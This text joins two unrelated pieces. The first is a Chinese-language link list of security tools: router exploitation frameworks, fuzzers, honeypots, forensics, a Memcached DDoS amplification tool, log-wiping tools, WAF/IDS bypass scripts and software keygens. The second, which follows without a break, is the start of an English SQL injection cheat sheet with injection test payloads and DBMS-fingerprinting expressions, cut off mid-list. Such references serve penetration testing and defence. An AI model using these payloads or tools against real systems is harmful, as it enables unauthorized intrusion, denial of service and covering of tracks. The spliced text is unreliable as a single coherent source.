https://github.com/UnicornTeam/HackCube-Special 独角兽实验室硬件渗透测试平台 ## IoT安全 - https://github.com/w3h/icsmaster 整合工控安全资源 - https://github.com/V33RU/IoTSecurity101 IoT工控安全与物联网安全学习的一些文章和资源 - http://www.freebuf.com/ics-articles 工控相关 - http://www.freebuf.com/sectool/174567.html 工业控制系统(ICS)安全专家必备的测试工具和安全资源 - http://www.freebuf.com/articles/ics-articles/178822.html 浅析煤炭企业如何进行工控安全建设 - http://www.freebuf.com/articles/network/178251.html 工控安全现场实施经验谈之工控系统如何加强主机防护 - https://github.com/hslatman/awesome-industrial-control-system-security 工控系统安全方向优秀资源收集仓库 - https://github.com/adi0x90/attifyos IoT集成安全测试系统,带有一些常用的软件 - https://github.com/moki-ics/moki 一键配置类似kali的工控渗透测试系统的脚本, - https://gitlab.com/expliot_framework/expliot py3,工控安全漏洞测试框架 - https://github.com/dark-lbp/isf py2,工控中类似msf的测试框架 - https://github.com/enddo/smod py2,使用了scapy模块,主要针对modbus协议测试 - https://github.com/shodan-labs/iotdb nmap配合shodan API扫描IoT设备 - https://github.com/XHermitOne/icscanner 带界面的ics扫描器 - https://github.com/yanlinlin82/plcscan 通过TCP/102和TCP/502识别互联网上PLC设备和其他Modbus设备 - https://github.com/nsacyber/GRASSMARLIN NSA旗下ICS/SCADA态势感知 - https://github.com/nezza/scada-stuff 对 SCADA/ICS设备进行逆向与攻击 ### 摄像头安全 - https://github.com/woj-ciech/kamerka 配合shodan API扫描到的摄像头地理位置显示在地图上 - https://github.com/Ullaakut/cameradar GO,针对摄像头RTSP协议渗透测试,附弱口令字典 - https://github.com/Ullaakut/camerattack GO,摄像头远程禁用 - https://github.com/NIteshx2/UltimateSecurityCam py3,摄像头监测外来人员软件,有防欺骗设置 ### 路由安全 - http://stascorp.com RouterScan毛子开发的路由器漏洞利用工具,界面化很强大 - https://github.com/threat9/routersploit py3,仿msf路由器漏洞利用框架 - https://github.com/jh00nbr/Routerhunter-2.0 已停止更新,路由器漏洞扫描利用 - https://github.com/googleinurl/RouterHunterBR php,路由器设备漏洞扫描利用 - https://github.com/scu-igroup/telnet-scanner Telnet服务密码撞库 ### 物联网安全 - https://github.com/RUB-NDS/PRET 打印机攻击框架 - https://github.com/rapid7/IoTSeeker 物联网设备默认密码扫描检测工具 - https://github.com/schutzwerk/CANalyzat0r 专有汽车协议的安全分析工具包 - https://github.com/pasta-auto 智能汽车测试 ### Fuzz模糊测试漏洞挖掘 - http://www.freebuf.com/articles/rookie/169413.html 一系列用于Fuzzing学习的资源汇总 - https://github.com/secfigo/Awesome-Fuzzing Fuzz相关学习资料 - https://github.com/fuzzdb-project/fuzzdb fuzz资料数据库 - https://github.com/ivanfratric/winafl AFL for fuzzing Windows binaries,原创技术分析 | AFL漏洞挖掘技术漫谈 - https://github.com/attekett/NodeFuzz a fuzzer harness for web browsers and browser like applications. - https://github.com/google/oss-fuzz Continuous Fuzzing for Open Source Software - http://blog.topsec.com.cn/ad_lab/alphafuzzer/ 以文件格式为主的漏洞挖掘工具 - https://bbs.ichunqiu.com/thread-24898-1-1.html Test404 -HTTP Fuzzer V3.0 - https://github.com/xmendez/wfuzz py,Web安全模糊测试工具,模块化可处理burp所抓请求和响应报文 - https://github.com/1N3/BlackWidow 基于 Python 实现的 Web 爬虫,用于收集目标网站的情报信息并对 OWASP 漏洞进行模糊测试 - https://github.com/bunzen/pySSDeep py,一个基于模糊哈希(Fuzzy Hashing)算法的工具。go,glaslos/ssdeep;C,ssdeep-project/ssdeep - - https://github.com/googleprojectzero/winafl AFL针对Windows二进制进行测试 ## 安全防护 - https://github.com/baidu/AdvBox Advbox是支持多种深度学习平台的AI模型安全工具箱,既支持白盒和黑盒算法生成对抗样本,衡量AI模型鲁棒性,也支持常见的防御算法 - https://github.com/quoscient/octopus 区块链智能合约安全分析工具 - https://github.com/Cyb3rWard0g/HELK 具有高级分析功能的威胁狩猎 ELK - https://github.com/trimstray/otseca linux系统审计工具,可以导出系统配置,生成报表 - https://github.com/BugScanTeam/DNSLog 一款基于django监控 DNS 解析记录和 HTTP 访问记录的工具,可以配合盲注、xss、解析对方真实ip使用 - https://github.com/mwrlabs/dref DNS 重绑定利用框架 - https://github.com/chengr28/Pcap_DNSProxy/blob/master/README.zh-Hans.md Pcap_DNSProxy 是一个基于 WinPcap/LibPcap 用于过滤 DNS 投毒污染的工具 - https://github.com/PlagueScanner/PlagueScanner 使用python实现的集成ClamAV、ESET、Bitdefender的反病毒引擎 - https://github.com/m4rco-/dorothy2 一款木马、僵尸网络分析框架 - http://github.com/jumpserver/jumpserver 基于 Python3 的开源堡垒机 - https://github.com/github/glb-director 负载均衡组件GLB,数据解析使用了dpdk - https://github.com/processhacker/processhacker 监控系统资源、软件调试、检测恶意软件,管理进程 - https://github.com/TKCERT/mail-security-tester 检测邮件防护与过滤系统的测试框架 - https://github.com/chaitin/sqlchop-http-proxy 利用HTTP 反向代理,内置 SQLChop 作为 SQL 注入攻击检测模块,可以拦截 SQL 注入流量而放行正常流量 - https://github.com/OWASP/SecureTea-Project 当有人私自触碰电脑鼠标或触摸板,进行报警 ### 代码审计应用测试 - https://www.waitalone.cn/seay-source-code-auditv2.html Seay源代码审计系统2.1版本 - https://github.com/pyupio/safety 检查所有已安装 Python 包, 查找已知的安全漏洞 - https://github.com/pumasecurity/puma-scan 实时代码审计,vs插件 - https://github.com/wufeifei/cobra 白盒代码安全审计系统 - https://github.com/OneSourceCat/phpvulhunter 静态php代码审计 - https://github.com/ripsscanner/rips 基于php的php代码审计工具 - https://github.com/Qihoo360/phptrace 跟踪、分析PHP运行情况的工具 - https://github.com/ajinabraham/NodeJsScan Node.JS应用代码审计 - https://github.com/ctxis/beemka 针对Electron App的漏洞利用工具包 - https://github.com/doyensec/electronegativity Electron应用代码审计,App的错误配置和安全问题 - https://github.com/shengqi158/pyvulhunter Python应用审计 - https://github.com/securego/gosec Go 语言源码安全分析工具 - https://github.com/GoSSIP-SJTU/TripleDoggy 基于clang的c/c++/object-c源代码检测框架,有大量接口可以被调用 - https://github.com/ga0/pyprotect 给python代码加密,防止逆向 - https://github.com/presidentbeef/brakeman Ruby on Rails应用静态代码分析 - https://github.com/python-security/pyt 用于检测Python Web应用程序中的安全漏洞的静态分析工具 - https://github.com/m4ll0k/WPSploit Wordpress插件代码安全审计 - https://github.com/elcodigok/wphardening 加强任何WordPress安装的安全 ### 大数据平台安全 - https://github.com/shouc/BDA 针对hadoop/spark/mysql等大数据平台的审计与检测 - https://github.com/wavestone-cdt/hadoop-attack-library hadoop测试方式和工具集 ## 蜜罐安全 - https://github.com/paralax/awesome-honeypots 蜜罐开源技术收集 - https://github.com/threatstream/mhn 现代蜜网,集成了多种蜜罐的安装脚本,可以快速部署、使用,也能够快速的从节点收集数据 - https://github.com/dtag-dev-sec/tpotce T-POT,里面使用docker技术实现多个蜜罐组合,配合ELK进行研究与数据捕获 - https://www.freebuf.com/sectool/190840.html T-Pot多蜜罐平台使用心法 - https://github.com/n3uz/t-pot-autoinstall 将fork的T-POT蜜罐的一键安装脚本替换为国内加速镜像 ### Web蜜罐内网监测 - https://github.com/micheloosterhof/cowrie py2,使用ELK(ElasticSearch,LogStash,Kibana)进行数据分析,目前支持ssh,telnet,sftp等协议 - https://github.com/mushorg/snare py3,web安全蜜罐,可克隆指定Web页面 - https://github.com/honeynet/beeswarm py,使用agent探针与蜜罐进行实时交互来引诱攻击者 - https://github.com/thinkst/opencanary PY2,SNMP\RDP\SAMBA蜜罐 - https://github.com/p1r06u3/opencanary_web PY,TORNADO,内网低交互蜜罐。支持自动化安装,目前支持常见的16中协议,现为探针/蜜罐-管理的架构,可以考虑二次开发为探针-沙盒-管理的架构 - https://github.com/p1r06u3/opencanary_web - https://github.com/Cymmetria 知名欺骗防御蜜罐组织。Struct、weblogic、telnet、Cisco ASA、Micros等仿真蜜罐 - https://github.com/Cymmetria/honeycomb Cymmetria公司开源蜜罐框架,低交互 - https://github.com/honeytrap/honeytrap 可扩展蜜罐框架,支持探针部署与高交互蜜罐 - https://gosecure.net/2018/12/19/rdp-man-in-the-middle-smile-youre-on-camera/ RDP MITM,打造可记录图像和按键的 RDP 蜜罐(https://github.com/gosecure/pyrdp) ### 摄像头蜜罐 - https://github.com/alexbredo/honeypot-camera py,摄像头蜜罐。tornado模拟WEB服务,图片代替视频,可以考虑后期多加点图片和按钮 - https://github.com/EasyDarwin/EasyIPCamera C,RTSP服务器组件用以构建摄像头蜜罐 ### 工控蜜罐 - https://github.com/sjhilt/GasPot 模拟油电燃气工控系统 - https://github.com/djformby/GRFICS IoT工业仿真系统模拟框架,采用MODBUS协议对PLC虚拟机监视和控制 - https://github.com/RabitW/IoTSecurityNAT IoT测试系统,方便快速接入各种设备,进行安全测试 - https://github.com/mushorg/conpot 针对ICS/SCADA的低交互工控蜜罐,模拟Modbus和S7comm ## 逆向相关 - https://www.peerlyst.com/posts/resource-learning-how-to-reverse-malware-a-guide 恶意软件逆向指南和工具的集合 - https://github.com/ReFirmLabs/binwalk 二进制pwn文件自动化逆向,拥有多种插件 - https://github.com/angr/angr 一个具有动态符号执行和静态分析的二进制分析工具 - https://github.com/endgameinc/xori 自定义反汇编框架 - https://down.52pojie.cn/ 吾爱破解爱盘工具包 - https://github.com/blacknbunny/peanalyzer32 PE 文件分析和反汇编工具 - https://github.com/DominicBreuker/pspy 不用root权限就可以监控进程运行 ### CTF相关 - https://ctf-wiki.github.io/ctf-wiki/ CTFwiki,Misc/Crypto/Web/Assembly/Executable/Reverse/Pwn/Android/ICS - https://github.com/adon90/pentest_compilation ctf比赛与OSCP考试中常见的知识点和命令 - https://github.com/gabemarshall/microctfs 小型ctf镜像docker - https://github.com/giantbranch/pwn_deploy_chroot 部署多个pwn题到一个docker容器中 - https://github.com/facebook/fbctf CTF比赛框架 - https://github.com/0Chencc/CTFCrackTools CTF工具集成包 - https://github.com/guyoung/CaptfEncoder CTF密码编码全家桶,还有小程序版本 - https://github.com/Gallopsled/pwntools pwn类型,二进制利用框架 - https://github.com/ChrisTheCoolHut/Zeratool pwn类型,二进制利用框架 - https://github.com/ChrisTheCoolHut/Rocket-Shot pwn,自动攻击脚本 - https://0xrick.github.io/lists/stego/ 隐写术工具集,Steganography - A list of useful tools and resources - https://github.com/DominicBreuker/stego-toolkit 隐写工具包 - https://github.com/bugsafe/WeReport WeReport报告助手 - https://github.com/PELock/CrackMeZ3S-CTF-CrackMe-Tutorial 为CTF比赛编写CrackMe软件 ### 计算机与移动设备取证调查 - https://www.freebuf.com/articles/rookie/195107.html 记一次微信数据库解密过程。微信的加密数据库的解密密码是由“设备的IMEI(MEID)+用户的uin,进行MD5,然后取其前7位小写字母”构成的 - https://www.audacityteam.org/ 音频文件和波形图处理工具 - http://www.sweetscape.com/010editor/ 识别不同文件格式(模板)的16进制编辑器,具有文件修复功能 - http://www.magicexif.com/ 将照片图像中的exif信息数据化 - http://mediaarea.net/MediaInfo 类似exiftool来查看内容区域和元数据信息 - https://www.sno.phy.queensu.ca/~phil/exiftool/ 检查图像文件的exif元数据 - https://www.gimp.org/ Gimp提供了转换各类图像文件可视化数据的功能,还可以用于确认文件是否是一个图像文件 - https://github.com/volatilityfoundation/volatility windows内存取证分析 - https://github.com/gleeda/memtriage Windows内存取证分析 - https://github.com/SekoiaLab/Fastir_Collector Windows取证/信息收集,不限于内存,注册表,文件信息等 - https://github.com/Viralmaniar/Remote-Desktop-Caching- RDP信息复原,png图片格式 - https://github.com/comaeio/LiveCloudKd C,针对Hyper-V的内存取证 -https://github.com/sevagas/swap_digger 针对 Linux swap 进行取证分析的工具 - http://extundelete.sourceforge.net/ linux下的文件恢复 - https://github.com/viaforensics/android-forensics 安卓取证App和框架,可以对安卓设备内各种信息进行提取 - https://github.com/davidmcgrew/joy 用来捕获和分析内外网流量数据的包,主要用于进行网络调查、安全监控和取证 - https://github.com/USArmyResearchLab/Dshell 可扩展的网络取证分析框架,支持快速开发插件与解析网络数据包捕获 - http://qpdf.sourceforge.net/ 查看pdf文件并整理提取信息 - http://zipinfo.com/ 在无需提取的情况下列出了zip文件的内容信息 - http://f00l.de/pcapfix/ pcap文件修复 - https://www.cgsecurity.org/wiki/TestDisk 磁盘分区修复 - https://github.com/decalage2/oletools py,用于分析MS OLE2文件(结构化存储,复合文件二进制格式)和MS Office文档 - https://www.xplico.org/download 内存取证 - https://github.com/google/bochspwn-reloaded Bochspwn Reloaded(内核信息泄漏检测)工具 - https://github.com/abrignoni/DFIR-SQL-Query-Repo 收集用于数据取证的SQL查询模板 - https://www.freebuf.com/news/193684.html iOS取证技巧:在无损的情况下完整导出SQLite数据库 ## 移动安全 - https://github.com/Brucetg/App_Security App安全学习资源 - https://github.com/rovo89/Xposed 随心所欲修改安卓手机系统 - https://github.com/android-hacker/VirtualXposed 基于VirtualApp 和 epic 在非ROOT环境下运行Xposed模块的实现 - https://github.com/MobSF/Mobile-Security-Framework-MobSF 移动安全审计框架。android、ios、win - https://github.com/WooyunDota/DroidSSLUnpinning 安卓证书锁定解除的工具 - https://github.com/nccgroup/house 运行时手机 App 分析工具包, 带Web GUI - https://github.com/UltimateHackers/Diggy 从 Apk 文件中提取 URLs 的工具 - https://github.com/nettitude/scrounger iOS和Android移动应用程序渗透测试框架 - https://github.com/XekriCorp/LeakVM 安卓应用安全测试框架 - https://github.com/zsdlove/ApkVulCheck 安卓漏洞扫描工具 - https://github.com/samyk/frisky 针对 ios/macOS 应用的嗅探/修改/逆向/注入等工具 - https://github.com/GeoSn0w/OsirisJailbreak12 IOS12不完全越狱 - https://github.com/chaitin/passionfruit iOS应用逆向与分析工具,可以大大加速iOS应用安全分析过程 ### 防火墙规则、waf、CDN相关 - https://github.com/baidu/openrasp RASP,Runtime Application Self-Protection,实时应用自我保护,更智能,针对每个语言定制 - https://github.com/snort3/snort3 snort算是最出名的开源ids入侵检测 - https://github.com/chaitin/yanshi 长亭偃师(yanshi),雷池(SafeLine)防火墙核心引擎使用到的代码生成工具 - https://github.com/SpiderLabs/ModSecurity C,跨平台 WAF engine for Apache, IIS and Nginx - https://github.com/klaubert/waf-fle ModSecurity Web控制台 - https://github.com/xsec-lab/x-waf 适用于中小企业的云waf - https://github.com/jx-sec/jxwaf 基于openrestynginx+lua开发,独创的业务逻辑防护引擎和机器学习引擎,解决传统WAF无法对业务安全进行防护的痛点 - https://github.com/loveshell/ngx_lua_waf 基于lua-nginx-moduleopenresty的web应用防火墙 - https://github.com/Janusec/janusec 基于Golang开发的应用安全网关,具备WAF、CC攻击防御、证书私钥加密、负载均衡、统一Web化管理等功能。 - https://github.com/SpiderLabs/owasp-modsecurity-crs a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls - https://github.com/kirillwow/ids_bypass IDS Bypass 脚本 - https://github.com/milo2012/ipv4bypass 利用ipV6地址绕过waf - https://github.com/3xp10it/bypass_waf 防火墙绕过脚本 - https://github.com/m0rtem/CloudFail 针对Cloudfail,查找位于CDN后面网站的真实IP - https://github.com/Nitr4x/whichCDN CDN识别、检测 - https://github.com/3xp10it/xcdn 尝试找出cdn背后的真实ip,3xp10it.github.io 博客 ## 入侵检测 - https://github.com/Neo23x0/Loki 一款APT入侵痕迹扫描器 - https://github.com/ossec/ossec-hids 开源hids堡垒机 - https://github.com/grayddq/HIDS hids基于主机型入侵检测系统,一个人的安全部 - https://github.com/ysrc/yulong-hids 驭龙HIDS是一款由 YSRC 开源的入侵检测系统 - https://github.com/DianrongSecurity/AgentSmith-HIDS 点融开源HIDS,开源部分为主机情报收集工具 - https://github.com/Tencent/HaboMalHunter 哈勃分析系统,linux系统病毒分析及安全测试 - https://github.com/JPCERTCC/LogonTracer 根据win登陆记录日志来分析并用图形化展示恶意登陆行为 - https://github.com/anwi-wips/anwi 无线IDS, 基于低成本的Wi-Fi模块(ESP8266) - https://github.com/Security-Onion-Solutions/security-onion 基于ubuntu用于入侵检测,网络安全监控和日志管理,采用分布式架构 - https://github.com/jpcertcc/sysmonsearch 将Sysmon的日志结果可视化 - http://m.imooc.com/article/21236 快速自检电脑是否被黑客入侵过(Windows版) - http://www.freebuf.com/articles/system/157597.html 快速自检电脑是否被黑客入侵过(Linux版) - http://www.freebuf.com/rookie/179638.html 服务器入侵溯源小技巧整理 - https://github.com/zhanghaoyil/Hawk-I 基于无监督机器学习算法从Web日志中自动提取攻击Payload ### 恶意文件测与样本分析 - https://github.com/open-power-workgroup/Hospital 全国莆田系医院名单 - https://github.com/chenerlich/FCL 恶意代码使用的命令行收集 - https://paper.seebug.org/421 常见软件合集与恶意软件分析 - https://github.com/sapphirex00/Threat-Hunting apt恶意软件样本 - https://www.malware-traffic-analysis.net/ 恶意软件样本 - http://dasmalwerk.eu/ 恶意软件样本 - https://github.com/ytisf/theZoo 恶意软件样本 - https://github.com/mstfknn/malware-sample-library 恶意软件样本 - http://99.248.235.4/Library/ 恶意软件样本库。ladder - https://github.com/robbyFux/Ragpicker 恶意软件信息爬取汇总分析 - https://github.com/phage-nz/ph0neutria 恶意软件信息爬取汇总分析 - https://github.com/JR0driguezB/malware_configs 常见恶意配置文件 - https://github.com/sfaci/masc 扫描网站中的恶意软件, 以及其他一些网站维护功能 - https://github.com/Neo23x0/munin 依据文件 Hash 从各种在线恶意软件扫描服务提取信息的工具 - https://github.com/1lastBr3ath/drmine 自动化检测网页是否包含挖矿脚本的工具 - https://github.com/KasperskyLab/klara 卡巴斯基开源基于Yara的分布式恶意软件扫描系统, - https://github.com/botherder/kraken go,实现的Yara恶意软件扫描器 - https://github.com/alexandreborges/malwoverview simple,将恶意文件进行快速分类 - https://github.com/joxeankoret/pigaios 直接对比源代码与编译的二进制文件 - https://github.com/viper-framework py2,二进制分析和管理框架,对恶意文件进行分析 - https://github.com/netxfly/sec_check 通过信息采集(账户、连接、端口等)与yara扫描进行安全检测 - https://github.com/nao-sec/tknk_scanner yara引擎为基础的恶意软件识别框架 - https://github.com/felixweyne/ProcessSpawnControl powershell,对恶意程序进行检测与监控 - https://github.com/Aurore54F/JaSt 使用语法检测恶意/混淆的JS文件,https://www.blackhoodie.re/assets/archive/JaSt_blackhoodie.pdf - http://edr.sangfor.com.cn/ win,Linux下恶意软件、webshell检测查杀工具 - http://www.clamav.net/downloads 病毒查杀软件 - http://www.chkrootkit.org/ rootkit检测工具 - http://rootkit.nl/projects/rootkit_hunter.html rootkit检测工具 ### 恶意文件检测之webshell查杀扫描 - http://www.safedog.cn/ 安全狗web防火墙 - http://d99net.net/ win,啊D出品D盾_防火墙,包含waf与webshel检测功能 - https://github.com/he1m4n6a/findWebshell py,webshell检查工具,可后期添加后门指纹,很强大 - https://github.com/ym2011/ScanBackdoor 一款简洁的Webshell扫描工具 - https://github.com/erevus-cn/scan_webshell webshell扫描工具 - https://github.com/yassineaddi/BackdoorMan 可对指定目录进行php webshell检测 - https://github.com/nbs-system/php-malware-finder 一款高效率PHP-webshell扫描工具 - https://github.com/emposha/PHP-Shell-Detector 测试效率高达99%的webshell检测工具 - https://github.com/emposha/Shell-Detector Webshell扫描工具,支持php/perl/asp/aspx webshell扫描 ### 压力测试与DDOS相关 - https://github.com/ywjt/Dshield DDOS防护 - https://github.com/NewEraCracker/LOIC/ 一个为Windows设计的网络压力测试工具现已支持Mac OS——译者注 - https://github.com/649/Memcrashed-DDoS-Exploit 利用Memcached服务器的DDoS攻击工具, 向Memcached服务器发送伪造的UDP数据包使其向攻击目标回复大量数据包 - https://github.com/jseidl/GoldenEye py,DOS测试 - https://github.com/mschwager/dhcpwn DHCP IP 资源耗尽攻击工具 - https://github.com/Microsoft/Ethr GO,跨平台,TCP, UDP, HTTP, HTTPS压力测试工具 ### 匿名信息保护洋葱路由TorBrowser - https://github.com/leitbogioro/Fuck_Aliyun 关闭阿里云监控服务 - https://github.com/Nummer/Destroy-Windows-10-Spying DWS关闭windows监控服务 - https://github.com/Rizer0/Log-killer 日志清除,Windows/Linux 服务器中的所有 - https://github.com/360-A-Team/EventCleaner 日志擦除工具 - https://github.com/s-rah/onionscan darkweb暗网爬虫 - https://github.com/globaleaks/Tor2web darkweb暗网代理服务器,将onion的服务变为普通的服务 - https://github.com/milesrichardson/docker-onion-nmap 使用nmap扫描Tor网络上隐藏的"onion"服务 - https://github.com/GouveaHeitor/nipe 一个使所有流量通过Tor网络发出的脚本 - https://github.com/trimstray/multitor 启用多个tor通道转发流量,并设置负载均衡 ### 爬虫相关 - https://github.com/alphardex/looter 轻量型爬虫框架,类比Scrapy - https://github.com/luyishisi/Anti-Anti-Spider 过反爬虫 - https://github.com/xchaoinfo/fuck-login 模拟登录一些常见的网站 - https://github.com/Maicius/InterestingCrawler 抓取QQ空间说说内容并进行分析 - https://github.com/xjr7670/QQzone_crawler QQ 空间动态爬虫,利用cookie登录获取所有可访问好友空间的动态保存到本地 ## 在线自服务与工具 - https://github.com/Kickball/awesome-selfhosted awesome系列之自服务应用 - https://github.com/littlecodersh/itchat 微信个人号接口、微信机器人及命令行微信 - https://github.com/sym233/core-values-encoder js,社会主义核心价值观加密,https://sym233.github.io/core-values-encoder/ - https://github.com/valentinxxx/nginxconfig.io/ 在线nginx配置文件生成,demo网址https://nginxconfig.io - https://github.com/asciimoo/searx 搭建一个自己的搜索引擎,DEMO网址https://searx.me/ - http://sc.ftqq.com/3.version server酱微信通知 - https://osint.link Open Source Intelligence (OSINT) Tools & Resources - https://www.wolframalpha.com 根据问题直接给出答案的网站 - shodan.io 互联网感知引擎 - fofa.so 白帽汇NOSEC - https://www.oshadan.com 傻蛋联网设备搜索_湖南安数网络 - zoomeye.org 知道创宇互联网感知引擎 - https://sms.cngrok.com/receiving-sms 收码接码 - https://www.pdflibr.com/ 收码接码 - https://www.fakenamegenerator.com 多国身份信息模拟器 - https://recruitin.net Easily use Google to search profiles on LinkedIn - https://www.truthfinder.com 美国公民信息查询 - https://verify-email.org 邮件真实性验证 - https://safeweb.norton.com 诺顿网站安全检测 - http://www.vuln.cn/tools/ftp 在线FTP登录 - http://www.link114.cn/title/ 批量查询网站标题 - https://www.whatweb.net/ 在线web指纹识别 - https://hackertarget.com/ip-tools/ 提供api,ip相关工具、在线扫描器 - http://www.webscan.cc/ 同IP网站查询,C段查询,IP反查域名,C段旁注,旁注工具 - https://www.phpinfo.me/bing.php 在线旁站查询|C段查询|必应接口C段查询 - https://www.phpinfo.me/domain/ 在线子域名爆破 - https://www.dnsdb.io DNS查询,子域名查询,IP查询,A记录查询,域名解析,旁站查询 - https://dnsdumpster.com/ dns recon and research, find and lookup dns records - http://ip.chaxun.la/ ip反查域名---查询啦 - https://habo.qq.com 在线恶意文件检测 - https://www.virustotal.com 恶意软件检测 - http://r.virscan.org/ 恶意软件检测 - https://www.appscan.io 移动软件在线检测 - https://www.nomoreransom.org 常见勒索软件分析还原 - https://www.cmd5.com/ HASH密码在线破解 - https://www.onlinehashcrack.com 密码哈希在线破解,邮件通知 ### 在线办公套件 - https://sadd.io/ 在线操作系统 - https://github.com/zyx0814/dzzoffice 在线办公套件,DEMO网址demo.dzzoffice.com - https://github.com/RobbieHan/gistandard py,基于Django,OA工单办公管理系统 - https://github.com/pavanw3b/sh00t PY3,DJANGO,安全测试工单管理 - https://github.com/chaitin/strapdown-zeta 基于strapdown.js,长亭二次开发开源的Wiki系统,支持markdown - https://etherpad.net/ 在线可编辑记事本 - https://www.upload.ee/ 文件共享平台 - https://github.com/micahflee/onionshare 利用onion洋葱服务器匿名文件共享 - https://github.com/filebrowser/filebrowser GO,基于Caddy框架的网盘 - https://github.com/nextcloud/server php,私有云网盘,owncloud分支 - https://github.com/owncloud/core php,私有云网盘,界面不美观 - https://github.com/haiwen/seafile C,私有云网盘,速度快,功能少 - https://github.com/ymfe/yapi API管理工具 - https://thyrsi.com/ 图片上传分享工具 ### 隐私匿名加密 - https://www.lshack.cn/118/ 在线接收验证码/邮箱/粘贴板/文件传输大集合。 - http://bccto.me 一次性邮箱 - https://www.guerrillamail.com 一次性邮箱 - http://24mail.chacuo.net/ 一次性邮箱 - http://www.yopmail.com 一次性邮箱 - https://yandex.com/ 非手机邮箱 - https://mail.ru/ 非手机邮箱 - https://mail.protonmail.com/login 非手机邮箱 - https://github.com/walkor/workerman-chat php,在线聊天室,可扩展 - https://github.com/hack-chat https://hack.chat/?your-channel js,在线聊天,问号后面跟你的房间名 - https://github.com/akaxincom/openzaly java,聊天室,Akaxin为客户端闭源 - https://github.com/RocketChat/Rocket.Chat js,在线团队聊天服务器,https://rocket.chat/install - https://telegram.org - https://www.whatsapp.com - https://wire.com/en - https://signal.org - http://www.batmessenger.com - http://sid.co ### 在线资源 - https://github.com/DoubleLabyrinth/navicat-keygen navicat注册机 - https://github.com/DoubleLabyrinth/MobaXterm-keygen MobaXterm注册机 - http://www.zdfans.com zd423 - 软件分享平台领跑者 - https://www.flaticon.com 免费图标网站 - https://msdn.itellyou.cn 原生镜像 - https://www.freenom.com 注册免费域名,dns解析 - https://codebeautify.org 在线代码美化 - http://patorjk.com Text to ASCII Art Generator - https://www.seopojie.com SPAM,SEO *** **个人维护的安全预警维基百科,根据中华人民共和国《网络安全法》相关政策规定,本文章只做安全预警,不被允许通过本文章技术手段进行非法行为,使用技术的风险由您自行承担** - https://github.com/We5ter/Scanners-Box 增加条目,细化分类 - https://www.anquanke.com/opensource github搜索引擎 TheEnd ***
# SQL injection > A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. Attempting to manipulate SQL queries may have goals including: - Information Leakage - Disclosure of stored data - Manipulation of stored data - Bypassing authorisation controls ## Summary * [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md) * [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) * [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md) * [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) * [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md) * [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md) * [Entry point detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [SQL injection using SQLmap](#sql-injection-using-sqlmap) * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap) * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent) * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie) * [Second order injection](#second-order-injection) * [Shell](#shell) * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit) * [Using TOR with SQLmap](#using-tor-with-sqlmap) * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap) * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list) * [Authentication bypass](#authentication-bypass) * [Polyglot injection](#polyglot-injection-multicontext) * [Routed injection](#routed-injection) * [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update) * [WAF Bypass](#waf-bypass) ## Entry point detection Detection of an SQL injection entry point Simple characters ```sql ' %27 " %22 # %23 ; %3B ) Wildcard (*) ``` Multiple encoding ```sql %%2727 %25%27 ``` Merging characters ```sql `+HERP '||'DERP '+'herp ' 'DERP '%20'HERP '%2B'HERP ``` Logic Testing ```sql page.asp?id=1 or 1=1 -- true page.asp?id=1' or 1=1 -- true page.asp?id=1" or 1=1 -- true page.asp?id=1 and 1=2 -- false ``` Weird characters ```sql Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was transformed into U+0022 QUOTATION MARK (") Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (') ``` ## DBMS Identification ```c ["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"], ["connection_id()=connection_id()" ,"MYSQL"], ["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"], ["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"], ["@@CONNECTIONS>0" ,"MSSQL"], ["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"], ["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"], ["USER_ID(1)=USER_ID(1)" ,"MSSQL"], ["ROWNUM=ROWNUM" ,"ORACLE"], ["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"], ["LNNVL(0=123)" ,"ORACLE"], ["5::int=5" ,"POSTGRESQL"], ["5::integer=5" ,"POSTGRESQL"], ["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"], ["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"], ["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"], ["current_database()=current_database()" ,"POSTGRESQL"], ["sqlite_version()=sqlite_version()" ,"SQLITE"], ["last_insert_rowid()>1" ,"SQLITE"], ["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"], ["val(cvar(1))=1" ,"MSACCESS"], ["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"], ["cdbl(1)=cdbl(1)" ,"MSACCESS"], ["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"], ["'i'='i'", 